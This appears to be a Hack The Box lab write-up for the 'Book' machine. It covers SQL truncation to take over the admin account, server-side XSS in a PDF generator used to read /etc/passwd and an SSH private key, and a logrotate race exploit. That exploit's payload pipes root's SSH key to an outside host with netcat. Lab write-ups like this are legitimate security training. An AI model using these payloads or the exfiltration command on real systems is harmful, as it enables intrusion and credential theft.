HTB Writeup: Book

I don’t like reading that much

Enumeration

Hostname : book.htb

  1. nmap

    # Nmap 7.92 scan initiated Tue Jun 21 06:08:40 2022 as: nmap -sC -sV -T3 -oA nmap-tcp-all-ports.txt -p- -iL ip.txt
    Nmap scan report for 10.129.95.163 (10.129.95.163)
    Host is up (0.075s latency).
    Not shown: 65533 closed tcp ports (reset)
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 f7:fc:57:99:f6:82:e0:03:d6:03:bc:09:43:01:55:b7 (RSA)
    |   256 a3:e5:d1:74:c4:8a:e8:c8:52:c7:17:83:4a:54:31:bd (ECDSA)
    |_  256 e3:62:68:72:e2:c0:ae:46:67:3d:cb:46:bf:69:b9:6a (ED25519)
    80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
    | http-cookie-flags:
    |   /:
    |     PHPSESSID:
    |_      httponly flag not set
    |_http-title: LIBRARY - Read | Learn | Have Fun
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
       
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    # Nmap done at Tue Jun 21 06:09:18 2022 -- 1 IP address (1 host up) scanned in 38.12 seconds
    
  2. Web Server

    A web server on TCP/80 is detected. Visiting the website http://10.129.95.163

    Login Page

    Sign up page

Foothold

  1. On performing basic testing, the login/signup form is found vulnerable to username enumeration and SQL Truncation vulnerability.

    Source Code

    Source: https://book.hacktricks.xyz/pentesting-web/sql-injection#sql-truncation-attack

    Testing for SQL Truncation

    1. An account was created with credentials: [email protected]:Passw0rd!

    2. A second account was created, with credentials: [email protected] malicious:Password!123Since there are checks implemented on the front-end to check for a valid email, a MITM Proxy (BurpSuite) can be used to intercept and modify the request.

      Testing SQL Truncation

    3. Going back to login page, when the username of first account and password of second accounts were used, it resulted in account access of first account. [email protected]:Password!123

    Exploitation

    1. To exploit the flaw, a valid account/username is required. The web application is also vulnerable to username enumeration. On trying to signup with [email protected]an alert is displayed saying “User Exits!”

      Exploiting SQL Truncation 1

    2. A new account with credentials

      [email protected] malicious:Password

      Exploiting SQL Truncation 2

    3. When logging in with the credentials [email protected]:Password, we are logged in as admin

      Exploiting SQL Truncation 3

      Exploiting SQL Truncation 4

    File upload functionality and Admin Panel (Server side XSS to LFI)

    1. A file upload functionality was found under the tab Collections(http://book.htb/collections.php)

      File Upload

    2. An admin panel was found at http://book.htb/admin

      Admin Panel

    3. Collections tab on admin panel has a server side PDF generation utility, which parsed the Title, Author and Link of books from database.

    4. To check for HTML injection, the form was submitted with <b>should be bold</b> as book title, and the contents were checked via admin panel.

    HTML Injection Test

    Exploitation

    1. It is found that the PDF generator is vulnerable to HTML content injection. To escalate further, JavaScript injection can be checked. The title <script>var x = new XMLHttpRequest();x.onload=function(){document.write(x.responseText)};x.open('GET','file:///etc/passwd');x.send();</script> should print the contents of file /etc/passwd from remote server.

      etc_passwd

    2. We find a user on the remote machine, reader. Using the same payload, and different file, we try extracting private SSH keys for reader if they exist.

      <script>var x = new XMLHttpRequest();x.onload=function(){document.write(x.responseText)};x.open('GET','file:///home/reader/.ssh/id_rsa');x.send();</script>
      

      Leaked SSH Private Key

      The immediate problem is, the key is overflowing from the printable area. For that, we need to add additional javascript to reduce the font size. The document.style.fontSize = "x-small" can probably help to extract the complete key.

      <p id='ad'></p><script>var x = new XMLHttpRequest();x.onload=function(){document.getElementById('ad').style.fontSize="x-small";document.getElementById('ad').innerHTML = x.responseText;};x.open('GET','file:///home/reader/.ssh/id_rsa');x.send();</script>
      

      Completely Leaked private Key

    3. The key is saved in a file, permissions of the file are modified to 0600 to make it useable as SSH Key.

    4. Connecting via SSH to [email protected] with id_rsa as private key, we have a valid SSH Session on the remote target as user reader

      User Session

Privilege Escalation

Enumeration

  1. Downloading and launching [linpeas.sh](http://linpeas.sh) gave a couple of information:

    1. A CRON Job is being executed by root which uses logrotate and configuration /root/log.cfg
    2. The web server directory is /var/www/html, which contained db.php, having credentials for MySQL database. book_admin:I_Hate_Book_Reading
    3. From MySQL database, credentials for [email protected] were retrieved: [email protected]:Sup3r_S3cur3_P455
  2. The credentials are not useful as they don’t work in any ways.

  3. The logrotate functionality present here if found to be vulnerable to a race condition. We have write access on the log files in the folder /home/reader/backups/

    Source: https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition

Exploitation

  1. Using the [logrotten](https://github.com/whotwagner/logrotten) exploit, we try to inject our payload of reverse shell to escalate our privileges to root.

    # This will require two seperate SSH Sessions
    # One to compile and execute logrotten exploit
    # Second to make changes to /home/reader/backups/access.log to trigger logrotate required for exploitation
       
    # Session 1
    gcc -o exploit logrotten.c
    echo 'cat /root/.ssh/id_rsa | /bin/nc 10.10.14.2 9090' > payloadfile
    ./exploit -p ./payloadfile /home/reader/backups/access.log
       
    # Session 2
    cat payloadfile > /home/reader/backups/access.log
       
    

Priv Esc 1

Priv Esc Success

Root Session

Privilege Escalation was achieved and the remote host has been completely pwned/owned.

Avatar
Mayank Malik
CRTP | Incident Responder | Synack Red Team Member | Threat Analyst | Security Researcher | Cloud/Network Architect

Mayank Malik is a tech savvy person, Red Team Enthusiast, and likes to wander around to learn new stuff. Cryptography, Networking and System Administrations are his forte. He’s one of the Founding Members for CTF Team, Abs0lut3Pwn4g3, and Core Member at DC 91120 (DEFCON Community Group). Apart from the mentioned skills, he’s good at communication skills and is goal oriented person. Yellow belt holder at pwn.college in pursue of learning and achieving Blue Belt.

Related